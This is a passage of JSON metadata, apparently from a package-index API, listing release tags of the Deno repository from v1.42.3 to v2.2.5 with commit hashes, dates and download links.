ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/